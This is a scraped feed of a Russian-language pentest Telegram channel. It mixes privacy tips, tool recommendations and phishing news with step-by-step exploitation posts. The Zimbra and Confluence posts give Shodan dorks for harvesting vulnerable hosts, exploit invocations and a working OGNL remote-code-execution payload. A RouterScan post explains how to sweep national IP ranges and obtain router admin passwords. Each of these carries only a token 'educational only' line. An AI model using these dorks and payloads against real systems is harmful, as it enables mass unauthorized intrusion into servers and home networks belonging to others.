#Arm1tage
1.58K subscribers
129 photos
4 videos
45 files
259 links
Разные заметки, инструменты, новости и прочее из мира и моего опыта в Кибербезопасности.

В общем "Пентест без мОразма"©
🇺🇦🇺🇦🇺🇦
Download Telegram
Forwarded from CyberYozh
🛡Как оставаться анонимным и не отслеживаемым? [ч.2]

6️⃣ Заблокируйте Cookie

Cookies содержат информацию и код, которые могут быть использованы для отслеживания. Это отслеживание используется для рекламы, а также для отслеживания просмотров. Эти файлы cookie для отслеживания содержат код, который может идентифицировать вас лично.

Используйте следующие коды в браузере Mozilla, чтобы включить только куки первой стороны:

Используйте about:config для доступа к этим настройкам

network.cookie.cookieBehavior : 1
network.cookie.lifetimePolicy : 3
network.cookie.lifetime.days : 1
privacy.trackingprotection.enabled ; true
privacy.trackingprotection.pbmode.enabled ; true

Таким образом, эти файлы cookie представляют большую угрозу для вашей анонимности.

7️⃣ Блокировка плагинов для получения анонимности

Плагины добавляют дополнительный код в API браузера для обеспечения дополнительной функциональности. Но при этом плагины раскрывают информацию о вашей системе. Эта информация затем используется для выявления потенциальных пользователей и клиентов для других продуктов компании.

Для обеспечения дополнительной безопасности и предотвращения утечки данных используйте только следующие плагины.

Они работают с любым браузером на базе Mozilla:

https://addons.mozilla.org/addon/https-everywhere
https://addons.mozilla.org/addon/noscript
https://addons.mozilla.org/addon/random-agent-spoofer
https://addons.mozilla.org/addon/no-resource-uri-leak

NoScript и Random Agent Spoofer необходимо настраивать вручную, что может занять пару минут, но дополнительная безопасность того стоит.

8️⃣ Не используйте Google

Google имеет привычку отслеживать все, что вы делаете, чтобы предлагать рекламные объявления, на которые у вас может возникнуть соблазн нажать. И как бы ни была полезна поисковая система Google, существует множество способов, с помощью которых она ставит под угрозу вашу личность.

Чтобы получить максимальную отдачу от поисковых систем, не ставя под угрозу свою личность. Такие сервисы, как StartPage, DuckDuckGo или даже TOR, показывают результаты поиска Google, но без хранения IP-адресов, файлов cookie или записей о ваших поисках.

9️⃣ Отключите свое местоположение

Веб-сайты могут получать данные о местоположении из вашей системы, если включена функция определения местоположения. Windows по умолчанию будет держать эту настройку включенной и использовать ее для определения вашего местоположения, нацеливания на вас рекламы и идентификации.

К счастью, есть способ отключить эту неприятную функцию. В Windows 10 перейдите в Настройки → Конфиденциальность → Местоположение. Нажмите кнопку «Изменить» и отключите настройку местоположения. Этого недостаточно, поскольку сайты все равно могут просматривать историю ваших старых местоположений. Поэтому убедитесь, что вы очистили и ее. Прокрутите вниз до «История местоположений» и нажмите кнопку «Очистить», где написано «Очистить историю на этом устройстве».

1️⃣0️⃣ Отключите доступ к камере и другим носителям и отключите аппаратное ускорение

Разрешение браузеру доступа к камере и микрофону, а также к системной информации может стать огромной катастрофой, если вы пытаетесь остаться незамеченным в интернете.

Они могут быть использованы для идентификации вашей личности, а также для прослушивания и записи вашего голоса и изображений. Если вы хотите быть анонимным, первое, что вам нужно сделать, это отозвать весь доступ к носителям информации.

Теперь, когда вы отключили доступ к системным носителям. Убедитесь, что аппаратное ускорение отключено. Они передают информацию о вашем устройстве, чтобы повысить производительность.

Для Mozilla используйте опцию about:config для доступа к расширенным настройкам:

gfx.direct2d.disabled : True
layers.acceleration.disabled : True
browser.display.use_document_fonts : 0
media.navigator.enabled : False
media.navigator.video.enabled : False
camera.control.face_detection.enabled : False

Обсудить в чате 👉 https://t.me/+jrxm2KHbIl9kMDQy
👍1
Эксплуатация Zimbra RCE: CVE-2022-27925 - CVE-2022-37042

—Недавно нашумевшая уязвимость позволяет вызвать РСЕ без аутентификации на сервисе для электронной почты на версиях 8.8.15P31 и 9.0.0P24 с помощью правильно созданного zip-архива.

—Найти устройства в шодане можно по дорку:
http.favicon.hash:"1624375939"
Или с помощью CLI сохранить результаты для нуклея:
shodan search 'http.favicon.hash:"1624375939"' --fields ip_str --limit 1000 > zimbra_urls.txt

—С помощью данного темплейта Nuclei можно быстро проверить наличие уязвимости на найденном устройстве:
Nuclei Template

—Эксплуатировать же можно этой утилитой (В параметр email передаем слово admin), в репозитории уже находятся нужные зип-архивы:
PoC
python3 zimbra-exploit.py https://ip admin

— Для более детального понимания уязвимости, рекомендую проанализировать код репозитория выше

—Ссылки по поводу данной CVE:
Статья 1
Статья 2

—Только в образовательных целях.


#cve
👍2
Создаём свои темплейты для нуклея. Очень полезно, когда надо автоматизировать определённую уязвимость, которой нет в общих базах

https://nuclei.projectdiscovery.io/templating-guide/
👍1
🐳2🔥1😁1
УЯЗВИМОСТЬ, КОТОРАЯ ЗАСТАВИЛА АВТОРА ОБОСРАТЬСЯ

Знакомьтесь, CVE-2020-35489, уязвимость в плагине Contact Form 7 в WordPress версии раньше 5.3.2 позволяет залить шелл с помощью обхода расширения файла и в последствии доступа к нему через папку wp-content/uploads... Скрипт-кидди автор, радуясь залитому на веб-сервис шеллу, тут же познал горечь поражения, потому что тупо не смог найти куда залился этот файл🤓

Статья


#cve #wordpress
😁4
Forwarded from GitTools
​​Name That Hash

Cовременная система идентификации хешей с рейтингами популярности, режимами John & Hashcat.

Определите MD5, SHA256 и более 300 других хэшей.

https://github.com/HashPals/Name-That-Hash

#soft #infosec #md5 #hash
👍2
ЕЩЕ ПРОЩЕМ ЧЕМ ЗИМБРА
Эксплуатация Confluence RCE: CVE-2022-26134

—Уязвимость позволяет вызвать РСЕ без аутентификации на Confluence следующих версий:
from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.

—Дорки для поиска в шодане через CLI:
shodan search 'http.favicon.hash:-305179312' --fields ip_str,port
shodan search 'http.component:"atlassian confluence"' --fields ip_str,port --limit 500
shodan search 'http.title:"Log In - Confluence" 200' --fields ip_str,port --limit 500
shodan search 'http.component:"atlassian confluence" http.title:"Log In - Confluence" 200' --fields ip_str,port --limit 500
shodan search 'http.component:"atlassian confluence"' --fields ip_str,port --limit 500
shodan search 'http.favicon.hash:-305179312 200' --fields ip_str,port --limit 500

—Nuclei темплейт сразу вызывает РСЕ, потому не придется пользоваться сторонними эксплоитами:
Nuclei Template

—PoC (не забудь URL-энкодить символы перед отправкой):
http://example.com/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/

—Статья:
Статья

—Эксплоит на гитхабе:
Эксплоит 1
Эксплоит 2

—Только в образовательных целях.


#cve
👍3
Forwarded from SHADOW:Group
​​🦊 Подборка браузерных расширений для Bug Bounty и пентеста

Некоторые расширения для браузера, которые помогают находить ошибки безопасности во время просмотра страницы.

▫️ KNOXSS для XSS
Расширение предназначено для поиска XSS уязвимостей, когда мы просматриваем веб-сайт. Доступно в двух версиях: бесплатная Community Edition и платная Pro версия.

▫️ Wappalyzer
Определяет CMS, JS-библиотеки, фреймворки и другие технологии, используемые на сайте. Это поможет вам сосредоточить процесс разведки на определенной технологии и ее версии.

▫️ Hackbar
Содержит полезные нагрузки для XSS-атак, SQL-инъекций, обхода WAF, LFI и т. д.

▫️ DotGit
Расширение для проверки наличия .git на посещаемых веб-сайтах. Также проверяет открытые файлы .env, security.txt и многое другое.

▫️ ModHeader
Помогает легко изменять заголовки HTTP-запросов и ответов в браузере.

▫️ Beautifier & Minify
Приводит в читабельный вид CSS, HTML и JavaScript код.

▫️ Retire.js
Отображает наличие уязвимих библиотек JavaScript. Это помогает найти известные уязвимости в JS и некоторые CVE, влияющие на сайты с уязвимой JS библиотекой.

▫️ Email Extractor
Автоматически сохраняет адреса электронной почты с веб-страниц, которые мы посещаем. Помогает при проведении атак социальной инженерии, брутфорс атак и т. д.

▫️ TruffleHog Chrome Extension
Сканирует посещаемые веб-сайты в поисках API ключей и учетных данных и уведомляет вас, если они будут найдены.

▫️ Fake Filler
Цель этого расширения — упростить и ускорить тестирование заполняемых форм разработчиками и тестировщиками. Помогает заполнить все формы ввода (текстовые поля, области, раскрывающиеся списки и т. д.) поддельными и случайно сгенерированными данными.

▫️ Cookie Editor
Позволяет изменять, удалять, добавлять значения cookie для различных целей тестирования. Можно протестировать на ошибки контроля доступа, повышение привилегий и т. д.

#web
👍2
ВЗЛОМ ЖОПЫ
Применяем RouterScan by Stas'M на деле

—Описание от автора:
Router Scan умеет находить и определять различные устройства из большого числа известных роутеров/маршрутизаторов и, что самое главное, - вытаскивать из них полезную информацию, в частности характеристики беспроводной сети: способ защиты точки доступа (шифрование), имя точки доступа (SSID) и ключ точки доступа (парольная фраза). Также получает информацию о WAN соединении (удобно при сканировании локальной сети) и выводит марку и модель роутера. Получение информации происходит по двум возможным путям: программа попытается подобрать пару логин/пароль к маршрутизатору из списка стандартных паролей, в результате чего получит доступ. Либо будут использованы неразрушающие уязвимости (или баги) для конкретной модели маршрутизатора, позволяющие получить необходимую информацию и/или обойти процесс авторизации.

—Короче:
Мы даем приложению список или диапазон IP-адресов и он проверяет их версию, наличие дефолтных паролей или уязвимостей.

—Список IP-адресов для каждой страны можно подсмотреть здесь, но предпочтительнее собрать через шодан.

—Как пользоваться:
Вбиваем наш список в раздел "Enter IP ranges to scan", тыкаем на "Start Scan" и смотрим раздел "Good Results". Во вкладке будет показана вся интересующая нас информация. В столбике Authorization будут показаны пароли, которые позволят нам без проблем зайти на админ панель.

—Только в образовательных целях.


#wifi
👍1👎1😱1
Forwarded from SHADOW:Group
​​🎣 Кража данных Steam с помощью техники Browser-in-the-Browser

Помните, в марте я рассказывал про новый метод фишинга, под названием Browser In The Browser (BITB)? Оказывается некоторые хакеры активно взяли его на вооружение и используют для кражи аккаунтов Steam.

В тематических чатах в телеграме и дискорде рассылаются ссылки на бесплатные скины или приглашения в команды для участия в турнирах LoL, CS, Dota 2 или PUBG. При переходе по ссылке открывается фишинговый сайт, который при попытке входа имитирует вызов всплывающего окна от Steam для аутентификации пользователей. Жертва думает, что входит через Steam и отдает свои данные злоумышленникам.

Более подробно вы можете ознакомиться в статье по ссылке.

#redteam #phishing
🤔3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Forwarded from Ralf Hacker Channel (Ralf Hacker)
course (2022).pdf
32.2 MB